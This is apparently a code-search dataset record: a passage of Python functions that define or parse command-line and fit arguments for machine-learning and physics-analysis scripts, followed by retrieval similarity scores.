v in _pars and isinstance ( v , 
ROOT.RooAbsArg ) :\n _s.add ( v )\n else :\n self.error ( \"Can not find %s in parameetrs\" % v )\n\n self.aux_keep.append ( _s ) \n _args.append ( ROOT.RooFit.Minos ( _s ) )\n \n elif kup in ( 'SAVE' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Save ( a ) )\n elif kup in ( 'CLONE' ,\n 'CLONEDATA' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.CloneData ( a ) )\n elif kup in ( 'OFFSET' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Offset ( a ) )\n elif kup in ( 'FITOPTIONS' ,\n 'FITOPTION' ) and isinstance ( a , string_types ) :\n _args.append ( ROOT.RooFit.FitOptions ( a ) )\n \n elif kup in ( 'CONSTRAINT' ,\n 'CONSTRAINTS' ,\n 'PARS' ,\n 'PARAMS' ,\n 'PARAMETER' ,\n 'PARAMETERS' ) :\n c = self.parse_constraints ( a )\n if c is None : self.error ('parse_args: Invalid constraint specification: %s/%s' % ( a , type ( a ) ) )\n else : _args.append ( c ) \n \n else :\n \n self.error ( 'parse_args: Unknown/illegal keyword argument: %s/%s, skip it ' % ( k , type ( a ) ) )\n \n \n if not check_arg ( 'numcpu' , *_args ) :\n if dataset and not isinstance ( dataset , ROOT.RooDataHist ) :\n _args.append ( ncpu ( len ( dataset ) ) )\n else :\n nc = numcpu()\n if 1 < nc : _args.append ( ROOT.RooFit.NumCPU ( nc ) )\n\n \n # =============================================================\n ## check options for the weighted datasets \n if dataset :\n \n weighted = dataset.isWeighted () \n sw2 = check_arg ( 'SumW2Error' , *_args )\n aer = check_arg ( 'AsymptoticError' , *_args )\n\n if sw2 and aer :\n logger.warning ( \"parse_args: Both ``SumW2Error'' and ``AsymptoticError'' are specified\" ) \n if weighted and sw2 :\n value = bool ( sw2.getInt( 0 ) )\n if not value : logger.warning (\"parse_args: 'SumW2=False' is specified for the weighted dataset!\")\n elif weighted and aer : \n value = bool ( aer.getInt( 0 ) )\n if not value : logger.warning (\"parse_args: 'AsymptoticError=False' is specified for the weighted dataset!\")\n ## elif weighted : \n ## logger.warning ( \"parse_args: Neither ``SumW2Error'' and ``AsymptoticError'' are specified for weighted dataset! ``SumW2=True'' is added\" )\n ## _args.append ( ROOT.RooFit.SumW2Error ( True ) ) \n elif not weighted and sw2 :\n logger.warning ( \"parse_args:``SumW2Error'' is specified for non-weighted dataset\" )\n elif not weighted and aer :\n logger.warning ( \"parse_args:``AsymptoticError'' is specified for non-weighted dataset\" )\n\n keys = [ str ( a ) for a in _args ]\n keys.sort ()\n \n ## check presence of \"non-trivial\" keys\n kset = set( keys ) \n kset.discard ( 'Save' ) ## trivial\n kset.discard ( 'NumCPU' ) ## trivial\n kset.discard ( 'Verbose' ) ## trivial \n kset.discard ( 'Timer' ) ## trivial \n kset.discard ( 'PrintLevel' ) ## trivial\n\n ## duplicates? 
\n if len ( kset ) != len ( keys ) :\n self.warning (\"duplicated options!\") \n #\n if kset : self.debug ( 'parse_args: Parsed arguments %s' % keys )\n else : self.debug ( 'parse_args: Parsed arguments %s' % keys )\n\n\n ## store them \n self.aux_keep.append ( _args ) \n \n return self.merge_args ( 5 , *_args )", "def add_val_arguments(self):\n self.add_test_arguments()", "def test_arguments(self):\n\n h.test_function_arguments(\n func=ScalingTransformer.fit,\n expected_arguments=[\"self\", \"X\", \"y\"],\n expected_default_values=(None,),\n )", "def __getinitargs__(self):\n return (self.cutout,)", "def predict(self, xs, **kwargs):", "def add_args(parser):\n parser.add_argument(\"data\", metavar=\"FILE\", help=\"file prefix for data\")\n parser.add_argument(\n \"--num-classes0\",\n type=int,\n default=-1,\n help=\"number of classes0\",\n )\n parser.add_argument(\"--no-shuffle\", action=\"store_true\", default=False)", "def paraChck(**kwargs):\n import sys\n\n \n def_val = {\n 'x_train':None,\n 'y_train':None,\n 'x_test':None,\n 'y_test':None,\n 'channel':1,\n 'input_img_cols':72,\n 'input_img_rows':72,\n 'nb_classes':13,\n 'nb_epoch': 5,\n 'batch_size' : 16,\n 'dict_label' : None} # default parameteters value\n\n diff = set(kwargs.keys()) - set(def_val.keys())\n if diff:\n print(\"Invalid args:\",tuple(diff),file=sys.stderr)\n return\n\n def_val.update(kwargs)\n return def_val", "def get_random_arguments(cls, coding_receptors=None, **kwargs):\n args = super(PrimacyCodingMixin, cls).get_random_arguments(**kwargs)\n \n if coding_receptors is None:\n coding_receptors = np.random.randint(1, 3)\n \n args['parameters']['coding_receptors'] = coding_receptors\n\n return args", "def setup_args(cls, parser):\n pass", "def add_arguments(self, parser):", "def train_dagger(): # add arguments as needed\n pass", "def mpl_patch_arguments(self):\n raise NotImplementedError()", "def train_input_args():\n # Create Parse using ArgumentParser\n parser = argparse.ArgumentParser()\n parser.add_argument('data_dir', type = str, help = 'Path to the data directory') \n parser.add_argument('--lr', type = float, default = 0.001, help = 'Learning rate (0.001)') \n parser.add_argument('--model', type = str, default = 'vgg16', help = 'TorchVision VGG model used: vgg19 or (vgg16)') \n parser.add_argument('--hidden', type = int, default = 4096, help = 'Number of hidden units (4096)') \n parser.add_argument('--epochs', type = int, default = 8, help = 'Number of training epochs (8)') \n parser.add_argument('--gpu', type = bool, default = True, help = '(True) = GPU enabled, False = GPU disabled') \n parser.add_argument('--chk', type = str, default = 'checkpoint', help = 'Checkpoint folder name') \n return parser.parse_args()", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"resnet based fcn Network\")\n parser.add_argument(\"--epochs\", type=int, default=epochs)\n parser.add_argument(\"--image_size\", type=int, default=image_size)\n parser.add_argument(\"--learning_rate\", type=float, default=learning_rate)\n return parser.parse_args()", "def set_params(self, **kwargs):\n ...", "def setParams(self, *, predictionCol=\"prediction\", labelCol=\"label\",\n metricName=\"meanAveragePrecision\", k=10):\n kwargs = self._input_kwargs\n return self._set(**kwargs)", "def _set_arguments(self):\n self._arguments = []", "def use_args(args):\n global DATA_PATH\n global IMAGES_FILE\n global WORKING_DIR\n global OUTPUT_DIR\n global OUTPUT_FILE_NAME\n global OUTPUT_FILE\n global LOAD_INDEXES\n global INDEXES_DIR\n 
global MODEL\n global JOIN_MODELS\n global MODEL1\n global MODEL2\n global ALL_TOGETHER\n global TRAINED_MODELS\n global TRAINED_MODELS_DIR\n global TRAINED_MODELS_DIR2\n global TRAINED_MODELS_DIRS\n global CROSS_VALIDATION\n global TRAIN_EPOCHS\n global FEATURES\n \n if args.data_path:\n # Change the default path of the images\n DATA_PATH = args.data_path\n IMAGES_FILE = os.path.join(DATA_PATH, IMAGES_FILE_NAME)\n \n if args.working_dir:\n # Change the default path of the working directory\n WORKING_DIR = args.working_dir\n OUTPUT_DIR = WORKING_DIR\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output_dir:\n # Change the default path of the output directory\n OUTPUT_DIR = os.path.join(WORKING_DIR, args.output_dir)\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output:\n # Change the default name of the output file\n OUTPUT_FILE_NAME = args.output\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.indexes_dir:\n # Load random and train indexes from file\n LOAD_INDEXES = True\n INDEXES_DIR = args.indexes_dir\n \n if args.model:\n # Select model\n MODEL = args.model\n \n if args.models:\n \n if not args.trained_models_dirs:\n raise Exception(\"Arg. `-M --models` requires arg. \"\n + \"`-T --trained_models_dirs`\")\n \n # Models to combine\n JOIN_MODELS = True\n MODEL1 = args.models[0]\n MODEL2 = args.models[1]\n \n if args.trained_models_dir:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dir\n \n if args.trained_models_dirs:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dirs[0]\n TRAINED_MODELS_DIR2 = args.trained_models_dirs[1]\n \n if args.all_together:\n # The four models together\n ALL_TOGETHER = True\n TRAINED_MODELS_DIRS = args.all_together\n \n if args.cross_validation:\n # Activate cross_validation\n CROSS_VALIDATION = True\n \n if args.train_epochs:\n # Change the default number of train epochs\n TRAIN_EPOCHS = args.train_epochs\n \n if args.features:\n # Nuber of best features to use\n FEATURES = args.features", "def optional_parameters(self):\n return ['bunches', 'target_thickness']", "def add_env_args(parser):\n # sawyer\n parser.add_argument(\n \"--reward_type\",\n type=str,\n default=\"dense\",\n choices=[\"dense\", \"sparse\"],\n help=\"reward type\",\n )\n parser.add_argument(\n \"--distance_threshold\",\n type=float,\n default=0.06,\n help=\"distance threshold for termination\",\n )\n parser.add_argument(\n \"--max_episode_steps\",\n type=int,\n default=70,\n help=\"maximum timesteps in an episode\",\n )\n parser.add_argument(\n \"--camera_name\",\n type=str,\n default=\"visview\",\n help=\"camera name in an environment\",\n )\n\n # observations\n parser.add_argument(\n \"--frame_skip\", type=int, default=1, help=\"Numer of skip frames\"\n )\n parser.add_argument(\n \"--action_repeat\", type=int, default=1, help=\"number of action repeats\"\n )\n parser.add_argument(\n \"--ctrl_reward_coef\", type=float, default=0, help=\"control reward coefficient\"\n )\n\n parser.add_argument(\n \"--kp\", type=float, default=40.0, help=\"p term for a PID controller\"\n ) # 150.)\n parser.add_argument(\n \"--kd\", type=float, default=8.0, help=\"d term for a PID controller\"\n ) # 20.)\n parser.add_argument(\n \"--ki\", type=float, default=0.0, help=\"i term for a PID controller\"\n )\n parser.add_argument(\n \"--frame_dt\", type=float, default=0.15, help=\"delta t between each frame\"\n ) # 0.1)\n 
parser.add_argument(\n \"--use_robot_indicator\",\n type=eval,\n default=False,\n help=\"enable visualization of robot indicator for motion planner\",\n )\n parser.add_argument(\n \"--use_target_robot_indicator\",\n type=eval,\n default=False,\n help=\"enable visualization of robot indicator for target position of motion planner\",\n )\n parser.add_argument(\n \"--success_reward\", type=float, default=150.0, help=\"completion reward\"\n )\n parser.add_argument(\n \"--contact_threshold\",\n type=float,\n default=-0.002,\n help=\"depth thredhold for contact\",\n )\n parser.add_argument(\n \"--joint_margin\", type=float, default=0.001, help=\"marin of each joint\"\n )\n parser.add_argument(\"--task_level\", type=str, default=\"easy\")\n parser.add_argument(\n \"--step_size\",\n type=float,\n default=0.02,\n help=\"step size for invalid target handling\",\n )\n # puck\n parser.add_argument(\"--puck_friction\", type=float, default=2.0)\n parser.add_argument(\"--puck_mass\", type=float, default=0.01)\n parser.add_argument(\"--source_env_puck_friction\", type=float, default=2.0)\n parser.add_argument(\"--source_env_puck_mass\", type=float, default=0.01)\n parser.add_argument(\"--target_env_puck_friction\", type=float, default=2.0)\n parser.add_argument(\"--target_env_puck_mass\", type=float, default=0.01)\n\n parser.add_argument(\"--env_ob_source\", type=str2bool, default=False)\n parser.add_argument(\"--end_effector\", type=str2bool, default=True)\n parser.add_argument(\"--ik_target\", type=str, default=\"grip_site\")\n parser.add_argument(\n \"--action_range\", type=float, default=0.1, help=\"range of radian\"\n )\n parser.add_argument(\"--dr\", type=str2bool, default=False)\n parser.add_argument(\"--dr_params_set\", type=str, default=\"IP_large_range\")\n\n parser.add_argument(\"--mod_env_params\", type=str2bool, default=False)\n parser.add_argument(\"--param_mod_instructions\", type=eval, default=[])\n\n parser.add_argument(\"--unity\", type=str2bool, default=False)\n parser.add_argument(\"--unity_editor\", type=str2bool, default=False)\n parser.add_argument(\"--virtual_display\", type=str, default=\":1\")\n parser.add_argument(\"--port\", type=int, default=4000)\n\n # FetchReach action\n parser.add_argument(\"--action_rotation_degrees\", type=float, default=0.0)\n parser.add_argument(\"--action_z_bias\", type=float, default=0.0)", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLabLFOV Network Inference.\")\n parser.add_argument(\"model_weights\", type=str,\n help=\"Path to the file with model weights.\")\n parser.add_argument(\"--save_dir\", type=str, default=SAVE_DIR,\n help=\"Where to save predicted mask.\")\n return parser.parse_args()", "def add_train_args(parser: ArgumentParser):\n # General arguments\n parser.add_argument('--task', type=str, default='regression',\n help='Regression or classification task')\n parser.add_argument('--seed', type=int, default=0,\n help='Random seed to use when splitting data into train/val/test sets.'\n 'When `num_folds` > 1, the first fold uses this seed and all'\n 'subsequent folds add 1 to the seed.')\n parser.add_argument('--data_path', type=str,\n help='Path to data CSV file')\n parser.add_argument('--split_path', type=str,\n help='Path to .npy file containing train/val/test split indices')\n parser.add_argument('--log_dir', type=str, default=None,\n help='Directory where model checkpoints will be saved')\n parser.add_argument('--model_path', type=str, default=None,\n help='Path to model file to load for evaluation time')\n 
parser.add_argument('--eval_output_dir', type=str, default=None,\n help='Directory to store outputs of evaluation, including predictions and attention visualization')\n\n\n # Training arguments\n parser.add_argument('--epoch', type=int, default=0,\n help='Starting epoch')\n parser.add_argument('--checkpoint_load_path', type=str,\n help='Path to model to load as checkpoint when resuming training')\n parser.add_argument('--checkpoint_dir', type=str,\n help='Path to save checkpoint model')\n parser.add_argument('--viz_dir', type=str,\n help='Path to save attention visualization')\n\n parser.add_argument('--n_epochs', type=int, default=60,\n help='Number of epochs to run')\n parser.add_argument('--batch_size', type=int, default=50,\n help='Batch size')\n parser.add_argument('--warmup_epochs', type=float, default=2.0,\n help='Number of epochs during which learning rate increases linearly from'\n 'init_lr to max_lr. Afterwards, learning rate decreases exponentially'\n 'from max_lr to final_lr.')\n parser.add_argument('--lr', type=float, default=1e-4,\n help='Learning rate')\n parser.add_argument('--num_workers', type=int, default=5,\n help='Number of workers to use in dataloader')\n parser.add_argument('--no_shuffle', action='store_true', default=False,\n help='Whether or not to retain default ordering during training')\n parser.add_argument('--shuffle_pairs', action='store_true', default=False,\n help='Whether or not to shuffle only pairs of stereoisomers')\n\n # Model arguments\n parser.add_argument('--gnn_type', type=str,\n choices=['gin', 'gcn', 'dmpnn', 'orig_dmpnn'],\n help='Type of gnn to use')\n parser.add_argument('--global_chiral_features', action='store_true', default=False,\n help='Use global chiral atom features')\n parser.add_argument('--chiral_features', action='store_true', default=False,\n help='Use local chiral atom features')\n parser.add_argument('--ft_boost', action='store_true', default=False, help='whether to concatenate R/S features after each MP layer')\n parser.add_argument('--hidden_size', type=int, default=32,\n help='Dimensionality of hidden layers')\n parser.add_argument('--depth', type=int, default=2,\n help='Number of message passing steps')\n parser.add_argument('--dropout', type=float, default=0.,\n help='Dropout probability')\n parser.add_argument('--graph_pool', type=str, default='sum',\n choices=['sum', 'mean', 'max', 'attn', 'set2set'],\n help='How to aggregate atom representations to molecule representation')\n parser.add_argument('--message', type=str, default='sum',\n choices=['sum', 'tetra_pd', 'tetra_permute', 'tetra_permute_concat'],\n help='How to pass neighbor messages')\n parser.add_argument('--n_layers', type=int, default=2,\n help='Number of final FFN layers')\n parser.add_argument('--skip_coef', type=float, default=1.,\n help='How much information retained in skip connections')\n\n # Attention arguments\n parser.add_argument('--attn_type', type=str, default='gat', choices=['gat', 'tang'],\n help='Attention type. 
GAT or that used in Tang 2020')\n parser.add_argument('--gat_act', type=str, default='leakyrelu',\n choices=['leakyrelu', 'relu'], help='Activation function used in GAT')\n parser.add_argument('--alpha', type=float, default=0.01,\n help='Alpha used in leakyReLU in GAT')\n parser.add_argument('--gat_depth', type=int, default=2,\n help='number of GAT attention layers')\n parser.add_argument('--heads', type=int, default=3,\n help='Number of attention heads')\n parser.add_argument('--attn_dropout', type=float, default=0.,\n help='Dropout probability for attention')\n parser.add_argument('--concat', action='store_true', default=False,\n help='concatenate heads or take average in multihead attention')", "def buildbertargs(): # type: () -> ClassificationArgs\n\n accargs = ClassificationArgs()\n accargs.num_train_epochs = 5\n accargs.fp16 = False\n accargs.overwrite_output_dir = True\n accargs.evaluate_during_training = False\n accargs.sliding_window = True\n accargs.max_seq_length = 256\n accargs.stride = 0.9\n accargs.labels_list = [1, 0]\n accargs.save_model_every_epoch = False\n accargs.silent = True\n accargs.manual_seed = 18\n\n return accargs", "def parse_args(mode=None):\n parser = ArgumentParser()\n if mode == \"train\":\n parser.add_train_arguments()\n elif mode == \"trainval\":\n parser.add_train_val_arguments()\n elif mode == \"val\":\n parser.add_val_arguments()\n elif mode == \"test\":\n parser.add_test_arguments()\n else:\n raise ValueError(\n \"build_argparser received incorrect mode.\"\n \" Possible modes: ('train', 'trainval', 'val', 'test').\"\n )\n return vars(parser.parse_args())", "def set_params(self, **kwargs):\n if 'nbins' in kwargs:\n self._nbins = kwargs['nbins']\n if self._nbins != 'auto':\n self._nbins = int(self._nbins)\n if 'symmetric' in kwargs:\n self._symmetric = kwargs['symmetric']\n if 'prune' in kwargs:\n prune = kwargs['prune']\n if prune is not None and prune not in ['upper', 'lower', 'both']:\n raise ValueError(\n \"prune must be 'upper', 'lower', 'both', or None\")\n self._prune = prune\n if 'min_n_ticks' in kwargs:\n self._min_n_ticks = max(1, kwargs['min_n_ticks'])\n if 'steps' in kwargs:\n steps = kwargs['steps']\n if steps is None:\n self._steps = [1, 1.5, 2, 2.5, 3, 4, 5, 6, 8, 10]\n else:\n self._steps = self._validate_steps(steps)\n self._extended_steps = self._staircase(self._steps)\n if 'integer' in kwargs:\n self._integer = kwargs['integer']", "def add_arguments(parser):\n # add onset detection related options to the existing parser\n g = parser.add_argument_group('save/load the activations')\n # add options for saving and loading the activations\n g.add_argument('--save', action='store_true', default=False,\n help='save the activations to file')\n g.add_argument('--load', action='store_true', default=False,\n help='load the activations from file')\n g.add_argument('--sep', action='store', default=None,\n help='separator for saving/loading the activations '\n '[default: None, i.e. 
numpy binary format]')\n # return the argument group so it can be modified if needed\n return g", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"Factorized Spatial Embeddings\")\n parser.add_argument(\"--mode\", default=MODE, choices=[\"train\", \"test\"])\n parser.add_argument(\"--batch_size\", type=int, default=BATCH_SIZE,\n help=\"Number of images sent to the network in one step.\")\n parser.add_argument(\"--input_dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the training or testing images.\")\n parser.add_argument(\"--K\", type=int, default=LANDMARK_N,\n help=\"Number of landmarks.\")\n parser.add_argument(\"--scale_size\", type=int, default=SCALE_SIZE,\n help=\"Scale images to this size before cropping to CROP_SIZE\")\n parser.add_argument(\"--crop_size\", type=int, default=CROP_SIZE,\n help=\"CROP images to this size\")\n parser.add_argument(\"--checkpoint\", default=CHECKPOINT,\n help=\"Directory with checkpoint to resume training from or use for testing\")\n parser.add_argument(\"--output_dir\", default=OUTPUT_DIR,\n help=\"Where to put output files\")\n parser.add_argument(\"--img_folder\",type=str, default='images',help=\"save the predicted landmarks\")\n \n return parser.parse_args()", "def analysis_config():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-g\", \"--ground-truth\", type=str, default=\"./BRUTE_FORCE_near_duplicates.tsv\")\n parser.add_argument(\"-p\", \"--pred\", type=str, default=\"./PRED_near_duplicates.tsv\")\n\n return parser.parse_args()", "def __init__(self, *args, **kwargs):\n self._observation_space = kwargs['observation_space']\n self._action_space = kwargs['action_space']\n self._seed = kwargs['seed']\n self._lr = kwargs['lr']\n self._gamma = kwargs['gamma']\n self._batch_size = kwargs['batch_size']\n\n if self._seed:\n from drl.tools.misc_util import set_seeds\n set_seeds(self._seed)\n\n #TODO:OpenAI baselines has helpers for the observation inputs..\n # this time we go ham on the class, but this could be made automatically\n #here" ]
[ "0.68575656", "0.68137014", "0.6691477", "0.6603834", "0.65638775", "0.65195256", "0.6398639", "0.6300945", "0.6298256", "0.6298256", "0.6298256", "0.6298256", "0.6298256", "0.62570894", "0.6243932", "0.6173412", "0.61286485", "0.6126391", "0.61123145", "0.61077875", "0.6099914", "0.60748315", "0.60170245", "0.60137916", "0.60081416", "0.6001194", "0.5997912", "0.59434474", "0.5912657", "0.5909036", "0.5908049", "0.58711874", "0.5857059", "0.58491665", "0.58371425", "0.58318585", "0.5830273", "0.5827019", "0.58225965", "0.58085966", "0.5802229", "0.5795602", "0.5781326", "0.57773894", "0.57732224", "0.57712245", "0.5768483", "0.57589245", "0.5747975", "0.57445544", "0.57341003", "0.573301", "0.57292217", "0.5723413", "0.5717178", "0.5712532", "0.57085377", "0.5707619", "0.5707257", "0.5691704", "0.5673521", "0.56726044", "0.566044", "0.56571764", "0.5656356", "0.5655374", "0.5655004", "0.5652481", "0.5650193", "0.56498194", "0.56436664", "0.56381893", "0.5636141", "0.56336045", "0.5630526", "0.5621709", "0.5621143", "0.5618081", "0.56122905", "0.561163", "0.5610805", "0.56085026", "0.56085014", "0.55974525", "0.5596085", "0.5586932", "0.55863315", "0.5583598", "0.55829763", "0.55829084", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.5582759", "0.55818504", "0.5577333", "0.5570365" ]
0.0
-1
Defines arguments used in diagnostic mode.
def diagnostic_subparser(subparsers):

    parser = subparsers.add_parser('diagnose',
                                   help='Runs AMFinder in diagnostic mode.',
                                   formatter_class=RawTextHelpFormatter)

    x = 'CNN1_pretrained_2021-01-18.h5'
    parser.add_argument('-net', '--network',
                        action='store', dest='model', metavar='H5',
                        type=str, default=x,
                        help='name of the pre-trained model to use for diagnostic.'
                             '\ndefault value: {}'.format(x))

    x = PAR['input_files']
    parser.add_argument('image', nargs='*', default=x,
                        help='plant root scan to be processed.'
                             '\ndefault value: {}'.format(x))

    return parser
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_arguments(self, parser):", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def __add_arguments__(cls, parser):", "def define_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"operation\", choices=[\"add\", \"subtract\", \"multiply\", \"divide\"], type=str)\n parser.add_argument(\"first_number\", help=\"The first number that will be calculated\", type=float)\n parser.add_argument(\"second_number\", help=\"The second number that will be calculated\", type=float)\n parser.add_argument(\"-w\", help=\"Add this option if you want a good morning message\", action=\"store_true\")\n\n return parser.parse_args()", "def arguments():\n main_desc = \"\"\"Debug awesome wm configurations in Xephyr sessions.\n\n Use `new` to create a new test config file cloned from your rc.lua\n Use `check` to test the Lua syntax on this file\n Use `start` to start a new awesome debug session\n Use `restart` to restart all awesome debug sessions\n Use `stop` to stop all awesome debug sessions\n \"\"\"\n\n parser = ArgumentParser(description=main_desc,\n formatter_class=RawDescriptionHelpFormatter)\n parser.add_argument(\"action\", choices=[\"new\", \"check\", \"start\", \"restart\",\n \"stop\"], help=\"the action to perform\")\n parser.add_argument(\"-t\", dest=\"test\", action=\"store_true\", default=False,\n help=\"use created test configuration file\")\n parser.add_argument(\"-s\", dest=\"screen\", help=\"the screen resolution\")\n parser.add_argument(\"-d\", dest=\"display\", help=\"the DISPLAY to use\")\n parser.add_argument(\"-v\", \"--version\", action=\"version\",\n version=\"%(prog)s {0}\".format(__version__),\n help=\"show program's version number and exit\")\n return parser", "def define_parameters(self):\n self.add_argument('--prefix', dest='prefix', type=str, optional=False,\n help='prefix for file names')\n self.add_argument('--sleepLength',\n dest = 'sleepLength',\n type = str,\n optional = True,\n help ='time to sleep before performing plugin action',\n default = '0')", "def add_arguments(self, parser):\n pass", "def add_arguments(self, parser):\n pass", "def prepare_arguments(self, parser):\n pass", "def _build_arguments(self):\n # TODO: comeback to allow test path override. maybe?\n # self._parser.add_argument(\n # '--test-path',\n # type=utils.validate_path,\n # required=False,\n # help=('Path th projects test Dockerfile. 
Dockerfile should be in the root of the test directory.')\n # )\n self._parser.add_argument(\n '--configs',\n type=bool,\n required=False,\n default=False,\n help=\"Would you like to inject configuration files?\"\n )", "def add_val_arguments(self):\n self.add_test_arguments()", "def definearguments(self, customparser):\n if not customparser:\n return\n customparser.add_option(\n '--url',\n dest='url',\n help=\"Use the provided iLO URL to login.\",\n default=None,\n )\n customparser.add_option(\n '-u',\n '--user',\n dest='user',\n help=\"If you are not logged in yet, including this flag along\"\\\n \" with the password and URL flags can be used to log into a\"\\\n \" server in the same command.\"\"\",\n default=None,\n )\n customparser.add_option(\n '-p',\n '--password',\n dest='password',\n help=\"\"\"Use the provided iLO password to log in.\"\"\",\n default=None,\n )\n customparser.add_option(\n '-e',\n '--enc',\n dest='encode',\n action='store_true',\n help=SUPPRESS_HELP,\n default=False,\n )", "def definearguments(self, customparser):\n\n customparser.add_option(\n '--disable',\n action=\"store_false\",\n dest=\"enableFeature\",\n help=\"Disable the Scalable Persistent Memory feature. Warning: \"\\\n \"any pending configuration changes will be lost.\"\n )", "def add_arguments(parser):\n return", "def _set_arguments(self):\n self._arguments = []", "def add_extra_args(self):\n self.parser.add_argument('--device', dest='device', type=str, help='Device ID, e.g. d--0001')", "def definearguments(self, customparser):\r\n if not customparser:\r\n return\r\n\r\n self.cmdbase.add_login_arguments_group(customparser)\r\n customparser.add_argument(\r\n \"--reboot\",\r\n dest=\"reboot\",\r\n help=\"Use this flag to perform a reboot command function after\"\r\n \" completion of operations. For help with parameters and\"\r\n \" descriptions regarding the reboot flag, run help reboot.\",\r\n default=None,\r\n )", "def _setup_arguments(self):\n\n self._parser.add_argument(\"-a\", \"--area-interest\",\n help=\"Area of interest to process, \"\n \"shapefile path\", required=True)\n # FUTURE VERSIONS\n # self._parser.add_argument(\"-s\", \"--srtm-dem\",\n # help=\"Path to SRTM DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-y\", \"--hsheds-dem\",\n # help=\"Path to HSHEDS DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-g\", \"--groves-file\",\n # help=\"Path to groves classification file. \"\n # \"Zip format\",\n # required=False)", "def add_arguments(cls):\n return [\n (('--yes',), dict(action='store_true', help='clean .git repo')),\n (('--variable', '-s'),\n dict(nargs='+', help='set extra variable,format is name:value')),\n (('--skip-builtin',),\n dict(action='store_true', help='skip replace builtin variable')),\n\n (('--dir',), dict(nargs='?', default=os.getcwd(),\n help='set working directory')),\n (('--debug',), dict(action='store_true', help='open debug mode')),\n (('--dry-run',), dict(action='store_true',\n help='print command instead execute it')),\n (('--verbose', '-v'), dict(action='count')),\n ]", "def Args(parser):", "def setup_args(cls) -> ParlaiParser:\n # we want to later deprecate this for add_cmdline_args", "def help_args():\n pass", "def fill_args(cls, toolchain, parser):\n pass # pass must be overloaded (if required)", "def argumente():\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('-d', '--device', type=str, default=\"/dev/ttyUSB0\",\n\thelp=\"Der Name der Schnittstelle die angesprochen werden soll. 
Default ist %(default)s\")\n\tparser.add_argument('-T', '--trigger', type=int, default=\"3\",\n\thelp=\"Der Trigger der verwendet werden soll. Default ist %(default)s\")\n\tparser.add_argument('-t', '--time', type=int, default=\"10\",\n\thelp=\"Laufzeit fuer eine Messung. Default ist %(default)s\")\n\n\tparser.add_argument('-s', '--schwellen', type=int, nargs=\"*\", default=[100, 100, 100],\n\thelp=\"Schwellenspannungen (in mV) fuer die drei Kanaele. Default ist %(default)s\")\n\n\tparser.add_argument('-g', '--graphical', action=\"store_true\",\n\thelp=\"Erzeuge eine grafische Darstellung von Messreihen. Wenn diese Option \\\n\t\t\tnicht gesetzt ist wird einfach das Ergebnis einer Messung im Terminal ausgegeben.\")\n\n\treturn parser.parse_args()", "def add_extra_arguments(self, parser):\n pass", "def add_arguments(parser):\n parser.add_argument('-e', '--environment', help='Environment name', required=True)\n parser.add_argument('-w', '--dont-wait', help='Skip waiting for the init to finish', action='store_true')\n parser.add_argument('-l', '--version-label', help='Version label', required=False)", "def _add_arguments(self):\r\n self._parser.add_argument(\r\n '-s', '--server',\r\n required=True,\r\n help=\"enter server name\")\r\n self._parser.add_argument(\r\n '-db', '--database',\r\n required=True,\r\n help='enter database name')\r\n self._parser.add_argument(\r\n '-u', '--username',\r\n help='enter username')\r\n self._parser.add_argument(\r\n '-p', '--password',\r\n help='enter password')\r\n #self._parser.add_argument(\r\n # '-h', '--help',\r\n # help='show this help message and exit')\r", "def add_common_arguments(self, short_options=True):\n getopts = lambda *args: args if short_options else args[1:]\n self.add_argument(*getopts('-d', '--debug'), action='store_true',\n help='Run with debug output.')\n self.add_argument(*getopts('-q', '--quiet'), action='count', default=0,\n help='Use once to hide info messages, twice to hide '\n 'warnings, and thrice to hide errors.')", "def add_extra_args(self):\n pass", "def get_cli_arguments(self):\n pass", "def full_args():\n return setup_args()", "def setup_args(cls, parser):\n pass", "def get_pytest_arguments(self, config_section):\n pass", "def arguments():\n\tparser = argparse.ArgumentParser(description=\"Integrate all columns of a data file. Time is in column 0.\")\n\tparser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print debug info.\")\n\tparser.add_argument(\"-k\", \"--kwh\", action=\"store_true\", dest=\"kwh\", default=False, help=\"output in kWh (instead of Ws)\")\n\tparser.add_argument(\"-f\", \"--file\", action=\"store\", dest=\"filename\", help=\"Path to file to read. Defaults to STDIN.\")\n\tparser.add_argument(\"-s\", \"--separator\", dest=\"separator\", default=\",\", help=\"Specify the separation character. 
